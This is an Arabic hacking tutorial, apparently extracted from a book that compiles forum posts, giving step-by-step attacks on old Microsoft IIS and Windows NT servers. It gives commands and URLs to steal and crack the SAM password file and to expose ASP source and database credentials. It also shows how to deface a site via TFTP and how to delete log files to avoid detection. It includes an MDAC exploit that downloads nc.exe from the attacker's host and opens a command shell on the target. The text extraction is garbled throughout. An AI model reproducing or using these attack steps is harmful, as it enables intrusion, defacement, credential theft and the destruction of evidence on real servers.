‫ طريقة كشف باسورد‬. ‫الدمينستريتور‬ Microsoft ) ‫نحتاج الى وهجود برنامجين‬ ‫م تنفيذ‬.‫ ( وهي لزو‬Access – L0phtCrack -: ‫بعض الخطوات لتالية وهي‬ ‫ باسورد الدمينستيتور للسيرفر يكون موهجود في‬\ ‫_ في دليل‬.SAM ‫ملف الـ‬ 328

‫‪ \winnt\repair‬وافضل برنامج لفك‬ ‫شفرة الباسورد هو برنامج ‪L0phtCrack‬‬ ‫كما هو موضح بالشكل التالي‪-:‬‬

‫ اذا كان هناك مستخدمين في السيرفر ويوهجد‬‫لديهم حساب فان معلوماتهم سوف تكون في ملف‬ ‫‪ PASSFILT.DLL‬ونستطيع تحديد مسار‬ ‫هذا الملف من تخلل الريجستري بواسطة هذا‬ ‫المفتا ح ‪-:‬‬ ‫‪HKEY_LOCAL_MACHINE\SYS‬‬ ‫‪TEM\CurrentControlSet\Cont‬‬ ‫‪rol\Lsa\SYSTEM32\PASSFIL‬‬ ‫‪T.DLL‬‬

‫‪329‬‬

‫ اذا كان السيرفر يعتمد في القراءة باستخدا‪.‬م‬‫صفحات الـ ‪ ASP‬للوصول الى البيانات من تخلل‬ ‫الـ ‪ MySQL‬فسوف نحتاج الى‬ ‫قاعدة‬ ‫تطبيق ثغرة ) ‪ ( htr.+‬للوصول الى باسورد‬ ‫المسئول عن هذة القاعده وهي كالتالي ‪-:‬‬ ‫‪http://www.xxxx.com/defa‬‬ ‫‪ult.asp+.htr‬‬ ‫عند ظهور صفحة الخطا في الوصول الى الصفحة‬ ‫المطلوبة وبالتحديد في سيكربت التنفيذ فالطريقة‬ ‫صحيحة وماعلينا فقط سوى سحب ملف‬ ‫‪ database.inc‬وقراءة محتوياته للعثور‬ ‫على اسم المستخد‪.‬م والباسورد للمسئول عن‬ ‫قاعدة البيانات ‪.‬‬

‫ تغيير الصفحة الرئيسية للموقع‬‫وعملية الب لوود بواسطة‬ ‫بربنامج ‪. TFTP‬‬ ‫‪ -1‬قم بانشاء صفحة وضع شعارك عليها‬ ‫واحفظها باسم ‪ index.htm‬على الـ ‪\:c‬‬ ‫‪330‬‬

‫‪ -2‬قم بتشغيل برنامج ‪ TFTP‬ونفذ المر في‬ ‫الفقرة التالية ‪.‬‬

‫‪331‬‬

‫‪c+tftp.exe+"-/‬‬ ‫‪i"+1.1.1.1+GET+index.ht‬‬ ‫‪m+C:\inetpub\wwwroot‬‬ ‫‪\index.htm‬‬ ‫وهو البرنامج اللز‪.‬م لعمل الب لوود‬ ‫‪tftp.ex‬‬ ‫ويجب ان يكون شغال في حالة تنفيذ‬ ‫‪e‬‬ ‫المر‬ ‫وهو بمثابة باراميترز لزو‪.‬م قراء‬ ‫"‪"i-‬‬ ‫البيانات في مكتبة الملفات‬ ‫‪1.1.1.1‬‬ ‫رقم اليبي الخاص بك‬ ‫وهو المر اللز‪.‬م لطلب الملفات مابين‬ ‫‪GET‬‬ ‫الرسال والستقبال‬ ‫‪index.‬‬ ‫اسم الملف بجهازك‬ ‫‪htm‬‬ ‫\‬ ‫‪inetpu‬‬ ‫اسم الدليل في السيرفر‬ ‫‪b\ww‬‬ ‫‪\wroot‬‬ ‫اسم الملف على السيرفر‬ ‫‪index.‬‬ ‫‪332‬‬

‫‪htm‬‬

‫ مسح ملفات اللوق حتى ل يتم‬‫التعرف عليك ‪.‬‬ ‫وتتم هذه العملية من تخلل حذف ملفات الـ ‪ Log‬من‬ ‫مجلد ‪ System32‬بواسطة المر ‪-:‬‬ ‫‪/‬‬ ‫‪c+del+c:/winnt/system32/lo‬‬ ‫‪gfiles/*.log‬‬ ‫انتهى ‪،،،‬‬

‫‪333‬‬

‫" الوختراق عن طريق اليوبنيكود‬ ‫)الجزء الثابني( "‬ ‫>منقول من منتديات شبكة الحز‪.‬م السلميةمنقولالكاتب‪ :‬بلك هنترمنقول من منتديات شبكة الحز‪.‬مالكاتب‪< DEMON :‬‬ ‫‪--------‬‬‫مقدمة ‪- :‬‬ ‫‪--------‬‬‫‪367‬‬

‫يعلم الجميع مدى انتشار سيرفرات ‪ IIS‬حيث تشكل‬ ‫النسبة الكبر المستخدمة في تشغيل مواقع النترنت ‪..‬‬ ‫ويعلم الجميع مدى ضعف الناحية المنية لهذه‬ ‫السيرفرات ‪ ..‬لذا قررت القيا‪.‬م بجمع اشهر ثغرات هذا‬ ‫النوع مع توضيح كيفية عملها ‪.‬‬ ‫‪--------‬‬‫ملحظة ‪- :‬‬ ‫‪--------‬‬‫معظم الطرق الموهجودة هنا تعمل على سيرفرات‬ ‫‪ IIS4.0‬و ‪ IIS5.0‬وهجميعها تعتمد على البورت ‪80‬‬ ‫))يعني من تخلل المتصفح(( ‪.‬‬ ‫‪------------‬‬‫المتطلبات ‪- :‬‬ ‫‪------------‬‬‫‪ CGI-Scanner -1‬هجيد ‪ ..‬أنا افضل ‪Whisker‬‬ ‫)يمكنك تنزيله من هذا الموقع ‪:‬‬ ‫‪( www.wiretrip.net/rfp‬‬ ‫‪ -2‬اكتيف بيرل لتشغيل ملفات البيرل ) يمكنك تنزيله‬ ‫من الموقع ‪:‬‬ ‫‪( /http://www.activestate.com‬‬ ‫‪368‬‬

‫‪ -3‬ويب سيرفر )اي نوع( اباتشي او ‪.. IIS‬‬

‫‪#########################‬‬ ‫‪#########################‬‬ ‫‪#########################‬‬

‫‪###########‬‬ ‫‪# Game Starts !#‬‬ ‫‪###########‬‬

‫‪---------------‬‬‫‪- : IIS Hack.exe‬‬ ‫‪---------------‬‬‫اكتشف تخبراء المن في شركة ‪ eEye‬ثغرة امنية‬ ‫تسمح لك بتحميل نسخه ذكية من ‪ nc.exe‬وهجعلها‬ ‫تنصت على المنفذ ‪.. 80‬‬ ‫وهذا سيعطيك سطر اوامر ‪ cmde.exe‬مع امتيازات‬ ‫‪369‬‬

‫‪. Administrator‬‬ ‫بامكانك انزال ‪ NC.exe‬و ‪ IIS Hack.exe‬من‬ ‫الموقع ‪. /http://www.technotronic.com‬‬ ‫ويجب تشغيل ويب سيرفر في هجهازك قبل تنفيذ الثغرة‬ ‫‪..‬‬ ‫قم بنسخ اداة ‪ nc.exe‬وضعها في الدليل الرئيسي‬ ‫للويب سيرفر لديك )في اباتشي ‪ (Htdocs‬وفي ‪IIS‬‬ ‫الدليل ‪. wwwroot‬‬ ‫ثم قم بتشغيل ‪: IISHack.exe‬‬ ‫‪c:\>iishack.exe‬‬ ‫‪http://www.target.com/ 80‬‬ ‫‪your_IP/ncx.exe‬‬ ‫وبعد اتما‪.‬م الخطوة السابقة بنجا ح ‪:‬‬ ‫‪ /c:\>nc http://www.target.com‬وستجد‬ ‫امامك ‪eGG SheLL‬‬ ‫ملحظة ‪ :‬تعمل هذه الثغرة على سيرفرات ‪IIS4.0‬‬ ‫فقط ))اذا لم يتم تركيب الرقعه(( ‪.‬‬ ‫‪do you want me to explain what to‬‬ ‫‪do next, hey common you must be‬‬ ‫‪kidding‬‬ ‫‪370‬‬

‫‪....hehe...‬‬

‫‪----------------‬‬‫‪-: MDAC = RDS‬‬ ‫‪----------------‬‬‫اعتقد انها ثغرة قديمة قليل )لكني ما زلت ارى ان‬ ‫‪ %40‬من المواقع تعاني منها ‪..‬‬ ‫تسمح لك هذه الثغرة بتشغيل اوامرك على النظا‪.‬م‬ ‫الهدف بشكل محلي ‪ ..‬سيتم تشغيل وامرك بصفتك‬ ‫مستخد‪.‬م ‪ SYSTEM‬اي بصلحيات مدير النظا‪.‬م ‪..‬‬ ‫على العمو‪.‬م اذا اردت معرفة اذا ما كان النظا‪.‬م مصابا‬ ‫بهذه الثغرة ا‪.‬م ل ‪..‬‬ ‫قم اول بالتصال بالنظا‪.‬م الهدف ‪c:\>nc -nw -w :‬‬ ‫‪ 2 http://www.host.com/ 80‬ثم قم بارسال‬ ‫المر ‪GET /msadc/msadcs.dll HTTP :‬‬ ‫فإذا كان الرد ‪ application/x_varg :‬فهذا يعني‬ ‫ان النظا‪.‬م مصاب )) اذا لم يتم ترقيعه (( ‪..‬‬ ‫بامكانك ايجاد سكربتات بيرل تسهل عليك العمل في‬ ‫هذا الموقع ‪www.wiretrip.net/rfp :‬‬ ‫‪(( mdac.pl - msadc2.pl )) v‬‬ ‫‪c:\> mdac.pl -h host.com‬‬ ‫‪371‬‬

‫‪Please type the NT commandline‬‬ ‫‪you want to run (cmd /c‬‬ ‫‪assumed):\n‬‬ ‫‪cmd /c‬‬ ‫إذا اردت تغيير الصفحه الرئيسية ما عليك ال تنفيذ‬ ‫المر ‪echo hacked by me hehe > :‬‬ ‫‪C:\inetpub\wwwroot\index.htm‬‬ ‫وإذا أردنا احكا‪.‬م السيطرة على الموقع بامكاننا تحميل‬ ‫‪ Hacker's Swiss knife Army‬اقصد‬ ‫‪ Nc.exe‬بواسطة هذا المر ‪:‬‬ ‫‪systemroot%&&tftp -i YourIP GET%‬‬ ‫‪nc.exe&&del ftptmp&& attrib -r‬‬ ‫‪nc.exe&&nc.exe -l -p 80 -t -e‬‬ ‫‪cmd.exe‬‬ ‫)) قم بقراءة المر من اليسار الى اليمين لتتمكن من‬ ‫قراءته هجيدا ((‬ ‫بعدها قم بالتصال بالنظا‪.‬م الهدف على المنفذ ‪80‬‬ ‫وستجد سطر اوامر مع امتيازات ‪Administrator‬‬ ‫‪.‬‬

‫‪-------------------------------------‬‬‫‪372‬‬

‫‪-: Codebrws.asp & Showcode.asp‬‬ ‫‪-------------------------------------‬‬‫الملفان عبارة عن قاريء ملفات ‪ ASP‬يأتي مع ‪IIS‬‬ ‫ولكنه ل يأتي محمل افتراضيا بل يجب على مدير‬ ‫النظا‪.‬م تفعيله ‪..‬‬ ‫فإذا كانت هذه الخدمة مفعلة ستسفيد منها كثيرا قهي‬ ‫تسمح لك بقراءة اي ملف ‪)) asp.‬اعني رؤية‬ ‫المصدر(( ‪.‬‬ ‫باستخدا‪.‬م هذا المر ستحصل على ملف السا‪.‬م )) اذا‬ ‫كان النظا‪.‬م مصابا (( ‪:‬‬ ‫‪http://www.victim.com/msadc/sampl‬‬ ‫‪_.es...nt/repair/sam‬‬ ‫بعد الحصول على ملف السا‪.‬م & ‪Expand it‬‬ ‫‪ .. Crack it‬باستخدا‪.‬م الداة المفضلة لدي ‪LC3.0‬‬ ‫)سيتم كسرها في اقل من ‪ 24‬ساعه ( ‪.‬‬

‫‪-------------‬‬‫‪- : Null.htw‬‬ ‫‪-----------‬‬‫عملية شر ح كيفية عمل هذه الثغرة معقد قليل ‪ ..‬لذا‬ ‫سأكتفي فقط بطريقة الستفادة منها ‪..‬‬ ‫‪373‬‬

‫باتختصار تسمح لك برؤية السورس كود لي ملف‬ ‫‪.. ASP‬‬ ‫لتنفيذ الثغرة ‪:‬‬ ‫?‪http://www.victim.com/null.htw‬‬ ‫‪CiWe...HiliteType=full‬‬ ‫سيعرض لك هذا الرابط السورس كود الخاص‬ ‫بالصفحه ‪. Default.asp‬‬

‫‪---------------------‬‬‫‪- : webhits.dll & .htw‬‬ ‫‪---------------------‬‬‫اول قم بتجربة اللنك على النظا‪.‬م الهدف ‪:‬‬ ‫‪http://www.victim.com/blabla.htw‬‬ ‫فإذا كان الرد بهذه العبارة ‪format of the :‬‬ ‫‪ QUERY_STRING is invalid‬فهذا يعني ان‬ ‫النظا‪.‬م الهدف مصاب بنسبة ‪. %90‬‬ ‫اتخيرا هجرب تنفيذ الثغرة بهذه الطريقة ‪:‬‬ ‫‪www.victim.com/xxxxxxxxx/xxxxxxx‬‬ ‫‪x/x...hilitetype=full‬‬ ‫مع تغيير الـ‬ ‫‪ XXXXX/XXXXX/XXXX/XXX.htw‬باحد هذه‬ ‫‪374‬‬

‫الملحقات ‪ ,‬وبالتأكيد سيعمل احدها ‪:‬‬ ‫‪iissamples/issamples/oop/qfullhit.ht‬‬ ‫‪w‬‬ ‫‪iissamples/issamples/oop/qsumrhit.‬‬ ‫‪htw‬‬ ‫‪isssamples/exair/search/qfullhit.htw‬‬ ‫‪isssamples/exair/search/qsumrhit.ht‬‬ ‫‪w‬‬ ‫وبالتالي ستحصل على ملف السا‪.‬م قم بكسره بواسطه‬ ‫الداة ‪.. LC3‬‬

‫‪-----------------------------------------------‬‬‫]‪ASP Alternate Data Streams [::‬‬ ‫‪-: $DATA‬‬ ‫‪-----------------------------------------------‬‬‫هذه الثغرة كانت بدايتها منذ العا‪.‬م ‪ .. 1998‬وهي‬ ‫مخصصة بالتحديد لسيرفرات ‪ IIS3.0‬والن تعمل‬ ‫على بعض سيرفرات ‪.. IIS4.0‬‬ ‫ومهمتها عرض السورس كود لي صفحه )) البعض‬ ‫يتساءل مالفائدة من عرض سورس الصفحه ؟؟ ((‬ ‫‪375‬‬

‫الهجابة ان بعض الصفحات تحتوي على معلومات‬ ‫مهمة مثل كلمات مرور قواعد البيانات مثل‬ ‫‪Global.asa‬‬ ‫يمكن تنفيذ الثغرة من المتصفح بواسطة هذا المر‬ ‫‪http://www.victim.com/default.asp::‬‬ ‫‪$DATA‬‬

‫‪-----------------‬‬‫‪- : ASP dot bug‬‬ ‫‪-----------------‬‬‫ربما اقد‪.‬م ثغرة في هذا النص هي هذه الثغرة حيث‬ ‫تقو‪.‬م ايضا بعرض السورس كود الخاص بأي صفحه ‪..‬‬ ‫حيث تم اكتشافها في العا‪.‬م ‪.. 1997‬‬ ‫ويتم تنفيذها من المتصفح بهذا الشكل ‪:‬‬ ‫‪http://www.victim.com/sample.asp.‬‬ ‫لحظ النقطة الموهجودة في اتخر السطر‬ ‫وهي فقط تعمل على سيرفرات ‪. IIS3.0‬‬

‫‪-----------------------------------‬‬‫‪- : ISM.DLL Buffer Truncation‬‬ ‫‪376‬‬

‫‪-----------------------------------‬‬‫تخطأ برمجي يسمح للمهاهجم بسحب الملفات ورؤوية‬ ‫السورس كود ايضا ‪..‬‬ ‫وفكرة الثغرة هي التحايل على السيرفر بإيهامه اننا‬ ‫قمنا يطلب ملف ما ‪ ..‬وفي الحقيقة نحن نقو‪.‬م بطلب‬ ‫ملف اتخر ‪..‬‬ ‫الملف المسؤوول عن هذا الخطأ هو ‪ ISM.dll‬حيث‬ ‫يتم تحميله بعدد كبير من الرموز المسافة )‪( 20%‬‬ ‫‪. Space‬‬ ‫يمكن تنفيذ الثغرة بهذا الشكل ‪:‬‬ ‫‪http://www.victim.com/global.asa‬‬ ‫‪%20(...